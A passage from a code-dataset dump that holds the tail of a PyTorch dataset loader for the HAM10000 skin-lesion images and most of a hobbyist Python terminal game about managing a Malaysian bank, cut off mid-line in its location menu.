(image, title) in enumerate(zip(images, titles)):\n        # rows come first in add_subplot, and both counts must be ints\n        a = fig.add_subplot(int(np.ceil(n_images/float(cols))), cols, n + 1)\n        if image.ndim == 2:\n            plt.gray()\n        plt.imshow(image)\n        a.set_title(title)\n\n    fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n    plt.show()\n\n\ndef create_train_val_split(data_dir,\n                           train_fraction, val_fraction,\n                           random_state=123):\n    \"\"\"Split data into training and validation sets, based on given fractions.\n\n    Args:\n        train_fraction (float): fraction of data to use for training.\n        val_fraction (float): fraction of data to use for validation.\n        random_state (int): seed for the random generator (for\n            reproducibility).\n\n    Returns:\n        (tuple): tuple with training image IDs and validation image IDs.\n\n    \"\"\"\n    assert(train_fraction + val_fraction <= 1.0)\n\n    # TODO move this somewhere else\n    LABEL_COLUMN = 'dx'\n    # IMAGE_ID_COLUMN = 'image_id'\n\n    # TODO: Implement a proper training/validation split\n    meta_data = read_meta_data(data_dir)\n\n    train_ids = list()\n    val_ids = list()\n\n    for gg in meta_data.groupby(LABEL_COLUMN):\n        # category = gg[0]\n        group_df = gg[1]\n\n        n = len(group_df)\n\n        # Number of training samples for this class\n        n_tr = int(n*train_fraction)\n\n        # To get as much data as possible\n        if (train_fraction + val_fraction == 1.0):\n            n_vd = n - n_tr\n        else:\n            n_vd = int(n*val_fraction)\n\n        # This is just used for shuffling, returns the whole group because of\n        # frac=1.0\n        group_ids = group_df.sample(\n            frac=1.0, random_state=random_state).index.to_list()\n\n        # Get ids for training and validation set\n        group_ids_train = group_ids[:n_tr]\n        group_ids_val = group_ids[n_tr:n_tr+n_vd]\n\n        # Add ids to ids list\n        train_ids.extend(group_ids_train)\n        val_ids.extend(group_ids_val)\n\n    return train_ids, val_ids\n\n\nclass HAM10000(Dataset):\n    \"\"\"HAM10000 dataset.\n\n    Attributes:\n        sampling_list (list): list of image IDs to use.\n        image_paths_dict (dict): dict to map image IDs to image paths.\n        meta_data (pandas.core.frame.DataFrame): meta data object.\n        class_map_dict (dict): dict to map label strings to label indices.\n        transforms (callable): transform applied to each loaded image.\n\n    \"\"\"\n\n    def __init__(self, data_dir, sampling_list,\n                 transforms=transforms.ToTensor()):\n        \"\"\"Constructor.\n\n        Args:\n            data_dir (str): path to images and metadata file\n            sampling_list (list): list of image IDs to use.\n\n        \"\"\"\n        self.data_dir = data_dir\n        self.sampling_list = sampling_list\n        self.image_paths_dict = get_image_paths_dict(self.data_dir)\n        self.meta_data = read_meta_data(self.data_dir)\n        self.class_map_dict = self.get_class_map_dict()\n\n        self.transforms = transforms\n\n\n    def get_labels(self):\n        \"\"\"Get labels of dataset and return them as list.\n\n        Returns:\n            (list): list of all labels.\n\n        \"\"\"\n        labels = [self.meta_data.loc[image_id]['dx']\n                  for image_id in self.sampling_list]\n\n        return labels\n\n    def get_num_classes(self):\n        \"\"\"Get number of classes.\n\n        Returns:\n            (int): number of classes.\n\n        \"\"\"\n        return len(self.class_map_dict)\n\n    def get_class_map_dict(self):\n        \"\"\"Get dict to map label strings to label indices.\n\n        Returns:\n            class_map_dict (dict): dict to map label strings to label indices.\n\n        \"\"\"\n        classes_list = list(\n            self.meta_data.groupby('dx')['lesion_id'].nunique().keys())\n\n        classes_list = sorted(classes_list)\n        class_map_dict = {}\n        for i, cls in enumerate(classes_list):\n            class_map_dict[cls] = i\n\n        return class_map_dict\n\n    def __len__(self):\n        \"\"\"Get size of dataset.\n\n        Returns:\n            (int): size of dataset, i.e. 
number of samples.\n\n \"\"\"\n return len(self.sampling_list)\n\n def __getitem__(self, index):\n \"\"\"Get item.\n\n Args:\n index (int): index.\n\n Returns:\n (tuple): tuple with image and label.\n\n \"\"\"\n image_id = self.sampling_list[index]\n img = Image.open(self.image_paths_dict.get(image_id))\n assert(image_id in self.meta_data.index)\n label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n\n img = self.transforms(img)\n\n return img, label\n\n def make_weights_for_balanced_classes(self):\n \"\"\"Function used to return weights for WeightedRandomSampler\n\n Inspired by:\n https://discuss.pytorch.org/t/balanced-sampling-between-classes-with-torchvision-dataloader/2703/3\n \"\"\"\n\n count = [0] * self.get_num_classes()\n\n # label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n labels = [self.class_map_dict[l] for l in self.get_labels()]\n\n # print(labels)\n\n # Count how many instances there are for each class\n for l in labels:\n count[l] += 1\n\n weight_per_class = [0.] * self.get_num_classes()\n\n N = float(sum(count))\n\n # Assign a weight which is inversely proportional to class frequency\n for i in range(self.get_num_classes()):\n weight_per_class[i] = N/float(count[i])\n\n # print(\"Weights per class:\")\n # print(weight_per_class)\n\n # Save results for debugging purposes\n self._weight_per_class = weight_per_class\n\n # Now assign a weight to each data point\n weight = [0] * len(labels)\n\n for idx, val in enumerate(labels):\n weight[idx] = weight_per_class[val]\n\n return weight\n","sub_path":"palladio/lib/dataset/HAM10000.py","file_name":"HAM10000.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"592690418","text":"# DEVELOPING SKILLS #\r\n# THIS GAME IS BASED ON THE BANK SYSTEM OF MALAYSIA (CURRENCY SYSTEM) #\r\n# MIGHT HAVE SOME UNSOLVED ERRORS #\r\n# Hastags are used for readability purpose #\r\n# BY PERI.R #\r\n\r\nimport random, replit, time, math\r\nfrom termcolor import cprint\r\nfrom colorama import *\r\n\r\ninit()\r\nreplit.clear()\r\n\r\n# Unrelated\r\nTimeToWork = 0\r\n\r\n# levels\r\nmoney = 10000 # Initialized the cash val\r\ngear_upgrade = 1 # Begins from level 1\r\nsecurity_upgrade = 1 # it will increment based on the options selection\r\nstaff_upgrade = 1 # it will increment based on the options selection\r\ncustomers = 10\r\n\r\n################################################################################################################\r\n\r\n# Upgrade Prices\r\ngear_upgrade_price = 1000\r\nsecurity_upgrade_price = 500\r\nstaff_upgrade_price = 250\r\nadvertise_price = 300\r\npaperwork_price = 10\r\n\r\n################################################################################################################\r\n\r\n# Move location prices\r\ncurrent_location = \"\"\r\n\r\nPenang_price = 500\r\nJohor_price = 700\r\nPahang_price = 900\r\nKedah_price = 1100\r\nPerlis_price = 1300\r\nNegeriSembilan_price = 1500\r\nKelantan_price = 1700\r\n\r\n################################################################################################################\r\n\r\n\r\n# List of locations if they choose above 4\r\nstart_locations = [\"Selangor\", \"Perak\", \"Malacca\"]\r\n\r\nprint(Fore.BLUE + \"\"\" \r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n\r\n ____ ___ _ ____ __ _ ______________ __ __ _______ __\r\n / __ )/ | / | / / //_/ | | / / _/_ __/ / / / / / / / ___/ / /\r\n / __ / /| | / |/ 
/ ,< | | /| / // / / / / /_/ / / / / /\\__ \\ / /\r\n / /_/ / ___ |/ /| / /| | | |/ |/ // / / / / __ / / /_/ /___/ / /_/\r\n/_____/_/ |_/_/ |_/_/ |_| |__/|__/___/ /_/ /_/ /_/ \\____//____/ (_)\r\n\r\n\r\n A virtual bank that you can manage, own, and destroy.\r\n Designed By : PERI.R\r\n\r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n\r\nLoading...\r\n\"\"\" + Fore.RESET)\r\n\r\ntime.sleep(3)\r\nprint(\"To start your bank, you persuaded your family and friends to be your customers\")\r\ncprint(\"+10 Customers!\", \"red\")\r\n\r\ntime.sleep(3)\r\n\r\n################################################################################################################\r\n\r\n# START LOCATION\r\nprint(\"Now that you got customers ready, you need to find a location for your bank!\")\r\nprint(\"1. Selangor\")\r\nprint(\"2. Perak\")\r\nprint(\"3. Malacca\")\r\nchoice = input(\">> \")\r\n\r\nif choice == \"1\":\r\n print(\"You set your location as Selangor\")\r\n current_location = \"Selangor\"\r\n\r\nif choice == \"2\":\r\n print(\"You set your location as Perak\")\r\n current_location = \"Perak\"\r\n\r\nif choice == \"3\":\r\n print(\"You set your location as Malacca\")\r\n current_location = \"Malacca\"\r\n\r\nif choice >= \"4\":\r\n random_location = random.choice(start_locations)\r\n current_location = random_location\r\n print(\"You set your location as: \" + random_location)\r\n\r\ntime.sleep(2)\r\n\r\nTypesOfPeople = [\"a single mom\", \"a homeless man\", \"a war veteran\", \"a small business owner\"]\r\nTypesOfAdvertisement = [\"a Radio\", \"a TV Series\", \"a Movie Series\", \"a Social Media Site\"]\r\n\r\n\r\n################################################################################################################\r\n\r\n# THE ACTUAL PROGRAM WHERE STUFF HAPPENS\r\n\r\ndef GetToWork():\r\n replit.clear()\r\n global money, customers, gear_upgrade, staff_upgrade, security_upgrade, paperwork_price, current_location, gear_upgrade_price, security_upgrade_price, staff_upgrade_price, TimeToWork\r\n\r\n TimeToWork = TimeToWork + 1\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER!\", \"red\", attrs=[\"bold\", \"underline\"])\r\n print(\"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\")\r\n print(\"Better luck next time\")\r\n return\r\n\r\n if customers <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n print(\"Your bank ran out of customers :(\")\r\n\r\n if money >= 100000:\r\n cprint(\"YOU WON! You got your bank to RM100,000\", \"green\", attrs=[\"bold\"])\r\n print(\"But however, there is a recession... 
so bye\")\r\n time.sleep(3)\r\n for i in range(1, money):\r\n time.sleep(0.1)\r\n money = money - 10000\r\n print(\"Your Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n replit.clear()\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER\", \"red\")\r\n print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\" + Fore.RESET)\r\n print(\"You won, but also lost\")\r\n return\r\n\r\n ################################################################################################################\r\n\r\n # printing current stats\r\n print(\"Current Stats:\")\r\n print(\"Your Balance: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Equipment Level: \" + str(gear_upgrade))\r\n print(\"Security Level: \" + str(security_upgrade))\r\n print(\"Staff Level: \" + str(staff_upgrade))\r\n print(\"Customers: \" + str(customers))\r\n print(\"Current Location: \" + current_location)\r\n print(\"\")\r\n print(\"You arrived at work! What do you do?\")\r\n print(\"1. Give out loans\")\r\n print(\"2. Accept advertisements\")\r\n print(\"3. Do paperwork\")\r\n print(\"4. Invest\")\r\n print(\"5. Check Donation Bin\")\r\n print(\"6. Sabotage Competition\")\r\n print(\"7. Leave work\")\r\n choice = input(\">> \")\r\n\r\n ################################################################################################################\r\n\r\n # Give out Loans\r\n if choice == \"1\":\r\n replit.clear()\r\n wantedLoan = random.randint(100, 1000)\r\n\r\n if money < wantedLoan:\r\n print(\"You don't have enough money for this!\")\r\n time.sleep(2)\r\n GetToWork()\r\n\r\n print(\r\n \"Someone walks in to your bank and asks for a loan of \" + Fore.GREEN + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n print(\"Do you accept their offer?\")\r\n yn = input(\"y/n: \")\r\n if yn == \"y\":\r\n chanceOfReturn = random.randint(1, 2)\r\n money = money - wantedLoan\r\n print(\"You have given the loan of \" + Fore.RED + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n print(\"Only time will tell if you get the money back\")\r\n time.sleep(5)\r\n\r\n ################################################################################################################\r\n\r\n # Get your money back (Successful Loan)\r\n if chanceOfReturn == 1:\r\n print(\"You were able to get your money back! 
And got paid for work!\")\r\n                PaidForWork = random.randint(25, 50)\r\n                total = wantedLoan + PaidForWork\r\n                print(\"You just got a total of: \" + Fore.GREEN + \"RM\" + str(total) + Fore.RESET)\r\n                money = money + total\r\n                print(\"Your total balance is: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n                time.sleep(4)\r\n                GetToWork()\r\n\r\n            ################################################################################################################\r\n\r\n            # No money back\r\n            if chanceOfReturn == 2:\r\n                print(\"You were unable to make any money back.\")\r\n                print(\"You lost: \" + Fore.RED + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n                time.sleep(3)\r\n                GetToWork()\r\n\r\n        if yn == \"n\":\r\n            print(\"Alright then, no loans at this time!\")\r\n            time.sleep(1)\r\n            GetToWork()\r\n\r\n    ################################################################################################################\r\n\r\n    # Accept Advertisements\r\n    if choice == \"2\":\r\n        TypesOfAdvertisement_chosen = random.choice(TypesOfAdvertisement)\r\n        Chosen_price = random.randint(50, 100)\r\n        print(\"A company has decided to use you as an advertiser!\")\r\n        print(\"The company that wants you to advertise is: \" + TypesOfAdvertisement_chosen)\r\n        print(\"They want to pay you: \" + Fore.GREEN + \"RM\" + str(Chosen_price) + Fore.RESET)\r\n        print(\"Do you accept this offer?\")\r\n\r\n        yn = input(\"y/n: \")\r\n        if yn == \"y\":\r\n            print(\"You just accepted the offer and got \" + Fore.GREEN + \"RM\" + str(Chosen_price) + Fore.RESET)\r\n            money = money + Chosen_price\r\n            print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n            time.sleep(2)\r\n            replit.clear()\r\n            GetToWork()\r\n\r\n        if yn == \"n\":\r\n            print(\"You refused the offer, and didn't make any money.\")\r\n            time.sleep(2)\r\n            GetToWork()\r\n\r\n    ################################################################################################################\r\n\r\n    # Do paperwork\r\n    if choice == \"3\":\r\n        level = gear_upgrade\r\n        print(\"Doing paperwork...\")\r\n        time.sleep(3)\r\n        earned = paperwork_price * level  # pay scales with equipment level; keep the base price constant\r\n        money = money + earned\r\n        print(\"You have earned \" + Fore.GREEN + \"RM\" + str(earned) + Fore.RESET)\r\n        print(\"Your Balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n        time.sleep(3)\r\n        GetToWork()\r\n\r\n    ################################################################################################################\r\n\r\n    # invest\r\n    if choice == \"4\":\r\n        bankInvestment = random.randint(50, 500)\r\n        chanceOfSuccess = random.randint(1, 2)\r\n\r\n        # 1 = Successful Investment\r\n        # 2 = Failed Investment\r\n\r\n        print(\"A company has requested that you invest in their company.\")\r\n        print(\"You will give them: \" + Fore.GREEN + \"RM\" + str(bankInvestment) + Fore.RESET)\r\n        print(\"Do you accept?\")\r\n        yn = input(\"y/n: \")\r\n\r\n        if yn == \"y\":\r\n            replit.clear()\r\n            print(\"You have given out the investment of \" + Fore.GREEN + \"RM\" + str(\r\n                bankInvestment) + Fore.RESET + \" Only time will tell if this was good or not!\")\r\n            time.sleep(3)\r\n\r\n            ################################################################################################################\r\n\r\n            # Successful Investment\r\n            if chanceOfSuccess == 1:\r\n                print(\"You made a successful investment! 
And you earned x2 your money!\")\r\n investment = bankInvestment * 2\r\n money = money + investment\r\n cprint(\"You earned: \" + Fore.GREEN + \"RM\" + str(investment) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(4)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Failed Investment\r\n if chanceOfSuccess == 2:\r\n money = money - bankInvestment\r\n print(\"The business you invested in failed!\")\r\n print(\"You did not make any money back!\")\r\n print(\"You wasted: \" + Fore.RED + \"RM\" + str(bankInvestment) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(4)\r\n GetToWork()\r\n\r\n if yn == \"n\":\r\n replit.clear()\r\n print(\"You refused to invest in the business!\")\r\n print(\"Maybe you would've made more money.\")\r\n time.sleep(3)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Check donation bin\r\n if choice == \"5\":\r\n amount = random.randint(10, 15)\r\n donation = amount * staff_upgrade + TimeToWork\r\n print(\"You look into the recycle bin\")\r\n print(\"There is a total of: \" + Fore.GREEN + \"RM\" + str(donation) + Fore.RESET)\r\n money = money + donation\r\n print(\"Your Balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Sabotage Competition\r\n if choice == \"6\":\r\n print(\"You leave the bank to try and sabotage other bank's advertisements!\")\r\n time.sleep(2)\r\n print(\"You were able to take down some of their posters!\")\r\n print(\"Some customers may not like this though!\")\r\n time.sleep(2)\r\n customersLost = random.randint(1, 50)\r\n customersGained = random.randint(1, 50)\r\n replit.clear()\r\n print(Fore.RED + \"You lost: \" + str(customersLost) + \" customers\" + Fore.RESET)\r\n print(Fore.GREEN + \"But you also gained: \" + str(customersGained) + \" customers\" + Fore.RESET)\r\n customers = customers - customersLost\r\n customers = customers + customersGained\r\n\r\n if customersGained > customersLost:\r\n difference = customersGained - customersLost\r\n print(Fore.GREEN + \"You now have made \" + str(difference) + \" new customers!\")\r\n time.sleep(2)\r\n\r\n if customersLost > customersGained:\r\n difference = customersLost - customersGained\r\n print(\"You were unable to make any new customers!\")\r\n print(Fore.RED + \"You were able to get: \" + str(difference) + \" customers!\" + Fore.RESET)\r\n time.sleep(2)\r\n\r\n print(\"Current Customers: \" + str(customers))\r\n time.sleep(5)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Leave work\r\n if choice == \"7\":\r\n replit.clear()\r\n print(\"Exiting work and going home...\")\r\n time.sleep(3)\r\n Menu()\r\n\r\n\r\n################################### MAIN MENU ##################################\r\n\r\ndef Menu():\r\n replit.clear()\r\n global money, customers, gear_upgrade, staff_upgrade, security_upgrade, paperwork_price, current_location, gear_upgrade_price, security_upgrade_price, staff_upgrade_price\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER!\", \"red\", attrs=[\"bold\", \"underline\"])\r\n 
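
# --- Editor's aside (hedged sketch, not part of the original game) ----------
# Every screen change in bank.py re-enters Menu() or GetToWork(), so the two
# functions recurse into each other and a long session can exhaust Python's
# default recursion limit (about 1000 frames). A flat state-machine loop
# avoids that; the step functions below are hypothetical stand-ins:
def menu_step():
    choice = input("1. Go to work  2. Quit >> ")
    return "work" if choice == "1" else "quit"

def work_step():
    print("You arrived at work!")
    return "menu"

def run_game():
    handlers = {"menu": menu_step, "work": work_step}
    state = "menu"
    while state != "quit":
        # each handler returns the next state's name instead of calling the
        # next screen directly, so the call stack stays flat
        state = handlers[state]()
# -----------------------------------------------------------------------------
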
print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\r\n\r\nYou won, but also lost. Better luck next time.\"\"\" + Fore.RESET)\r\n return\r\n\r\n if customers <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n print(\"Your bank ran out of customers :(\")\r\n\r\n if money >= 100000:\r\n cprint(\"YOU WON! You got your bank to RM100,000\", \"green\", attrs=[\"bold\"])\r\n print(\"But however, there is a recession... so bye\")\r\n time.sleep(4)\r\n for i in range(1, money):\r\n time.sleep(0.3)\r\n money = money - 1000\r\n cprint(\"Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n replit.clear()\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER\", \"red\")\r\n print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\" + Fore.RESET)\r\n return\r\n\r\n print(\"Current Balance: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Current Customers = \" + str(customers))\r\n print(\"Current Location: \" + current_location)\r\n print(\"\")\r\n print(\"Here is the main menu! What do you want to do?\")\r\n print(\"1. Upgrade Your Equipment (\" + Fore.GREEN + \"RM\" + str(gear_upgrade_price) + Fore.RESET + \") \" + str(\r\n gear_upgrade) + \"/5\")\r\n print(\"2. Upgrade Your Security (\" + Fore.GREEN + \"RM\" + str(security_upgrade_price) + Fore.RESET + \") \" + str(\r\n security_upgrade) + \"/5\")\r\n print(\"3. Upgrade Your Staff (\" + Fore.GREEN + \"RM\" + str(staff_upgrade_price) + Fore.RESET + \") \" + str(\r\n staff_upgrade) + \"/5\")\r\n print(\"4. Advertise (\" + Fore.GREEN + \"RM\" + str(advertise_price) + Fore.RESET + \")\")\r\n print(\"5. Move location\")\r\n print(\"6. 
Go To Work\")\r\n\r\n    choice = input(\">> \")\r\n\r\n    ################################################################################################################\r\n\r\n    # Equipment Upgrade\r\n    if choice == \"1\":\r\n        if money < gear_upgrade_price:\r\n            print(\"You do not have enough money for this upgrade!\")\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n\r\n        if gear_upgrade == 5:\r\n            print(\"You can no longer upgrade this!\")\r\n            time.sleep(2)\r\n            Menu()\r\n\r\n        print(\"Are you sure you would like to upgrade your Equipment for: \" + Fore.GREEN + \"RM\" + str(\r\n            gear_upgrade_price) + Fore.RESET)\r\n\r\n        yn = input(\"y/n: \")\r\n        if yn == \"y\":\r\n            money = money - gear_upgrade_price\r\n            gear_upgrade = gear_upgrade + 1\r\n            print(\"Taken away: \" + Fore.RED + \"RM\" + str(gear_upgrade_price) + Fore.RESET)\r\n            print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n            print(\"Your Equipment Level is now: \" + str(gear_upgrade))\r\n            gear_upgrade_price = gear_upgrade_price + 500\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n        if yn == \"n\":\r\n            replit.clear()\r\n            Menu()\r\n\r\n    ################################################################################################################\r\n\r\n    # Security Upgrade\r\n    if choice == \"2\":\r\n        if money < security_upgrade_price:\r\n            print(\"You do not have enough money for this upgrade!\")\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n\r\n        if security_upgrade == 5:\r\n            print(\"You can no longer upgrade this!\")\r\n            time.sleep(2)\r\n            Menu()\r\n\r\n        print(\"Are you sure you would like to upgrade your Security for: \" + Fore.GREEN + \"RM\" + str(\r\n            security_upgrade_price) + Fore.RESET)\r\n\r\n        yn = input(\"y/n: \")\r\n        if yn == \"y\":\r\n            money = money - security_upgrade_price\r\n            security_upgrade = security_upgrade + 1\r\n            print(\"Taken away: \" + Fore.RED + \"RM\" + str(security_upgrade_price) + Fore.RESET)\r\n            print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n            print(\"Your Security Level is now: \" + str(security_upgrade))\r\n            security_upgrade_price = security_upgrade_price + 500\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n\r\n        if yn == \"n\":\r\n            replit.clear()\r\n            Menu()\r\n\r\n    ################################################################################################################\r\n\r\n    # Staff Upgrade\r\n    if choice == \"3\":\r\n        if money < staff_upgrade_price:\r\n            print(\"You do not have enough money for this upgrade!\")\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n\r\n        if staff_upgrade == 5:\r\n            print(\"You can no longer upgrade this!\")\r\n            time.sleep(2)\r\n            Menu()\r\n\r\n        print(\"Are you sure you would like to upgrade your Staff for: \" + Fore.GREEN + \"RM\" + str(\r\n            staff_upgrade_price) + Fore.RESET)\r\n        yn = input(\"y/n: \")\r\n\r\n        if yn == \"y\":\r\n            money = money - staff_upgrade_price\r\n            staff_upgrade = staff_upgrade + 1\r\n            print(\"Taken away: \" + Fore.RED + \"RM\" + str(staff_upgrade_price) + Fore.RESET)\r\n            print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n            print(\"Your Staff Level is now: \" + str(staff_upgrade))\r\n            staff_upgrade_price = staff_upgrade_price + 250\r\n            time.sleep(3)\r\n            replit.clear()\r\n            Menu()\r\n\r\n        if yn == \"n\":\r\n            Menu()\r\n\r\n    ################################################################################################################\r\n\r\n    # Advertise!\r\n    if choice == \"4\":\r\n\r\n        if money < advertise_price:\r\n            print(\"You do not have enough money 
for this!\")\r\n time.sleep(2)\r\n Menu()\r\n\r\n ################################################################################################################\r\n\r\n # Robberies\r\n chanceOfRobbery = random.randint(1, 100)\r\n if security_upgrade == 1:\r\n if chanceOfRobbery < 50:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 2:\r\n if chanceOfRobbery < 40:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 3:\r\n if chanceOfRobbery < 30:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 4:\r\n if chanceOfRobbery < 20:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n if security_upgrade == 5:\r\n if chanceOfRobbery < 10:\r\n replit.clear()\r\n print(Fore.RED + \"BEWARE!\" + Fore.RESET)\r\n print(\"Robbery incoming!\")\r\n print(\"3...\")\r\n time.sleep(1)\r\n print(\"2...\")\r\n time.sleep(1)\r\n print(\"1...\")\r\n time.sleep(2)\r\n robbedMoney = math.floor(.35 * money)\r\n print(\"Robbers got away with: \" + Fore.RED + \"RM\" + str(robbedMoney) + Fore.RESET)\r\n money = money - robbedMoney\r\n\r\n if money <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n return\r\n\r\n time.sleep(2)\r\n Menu()\r\n\r\n money = money - advertise_price\r\n replit.clear()\r\n print(\"You paid: \" + Fore.RED + \"RM\" + str(advertise_price) + Fore.RESET)\r\n print(\"Printing Posters...\")\r\n time.sleep(2)\r\n print(\"Uploading Website Adverts...\")\r\n time.sleep(1)\r\n print(\"Created Billboard\")\r\n print(\"\")\r\n new_customers = random.randint(10, 30)\r\n customers = customers + new_customers\r\n\r\n print(\"Well done! 
You have achieved\", new_customers, \"new customers!\")\r\n NC_Money = new_customers * 5\r\n money = money + NC_Money\r\n print(\"You earned \" + Fore.GREEN + \"RM\" + str(NC_Money) + Fore.RESET + \" from new customers signing up!\")\r\n time.sleep(3)\r\n replit.clear()\r\n Menu()\r\n\r\n ###################### MOVING BANK LOCATIONS ###################################\r\n\r\n if choice == \"5\":\r\n replit.clear()\r\n print(\r\n \"You have decided to move your bank location to bigger cities for more money! But where do you choose? And what can you afford?\")\r\n print(\"1. Penang (\" + Fore.GREEN + \"RM\" + str(Penang_price) + Fore.RESET + \")\")\r\n print(\"2. Johor (\" + Fore.GREEN + \"RM\" + str(Johor_price) + Fore.RESET + \")\")\r\n print(\"3. Pahang (\" + Fore.GREEN + \"RM\" + str(Pahang_price) + Fore.RESET + \")\")\r\n print(\"4. Kedah (\" + Fore.GREEN + \"RM\" + str(Kedah_price) + Fore.RESET + \")\")\r\n print(\"5. Perlis (\" + Fore.GREEN + \"RM\" + str(Perlis_price) + Fore.RESET + \")\")\r\n print(\"6. Negeri Sembilan(\" + Fore.GREEN + \"RM\" + str(NegeriSembilan_price) + Fore.RESET + \")\")\r\n print(\"7. Kelantan 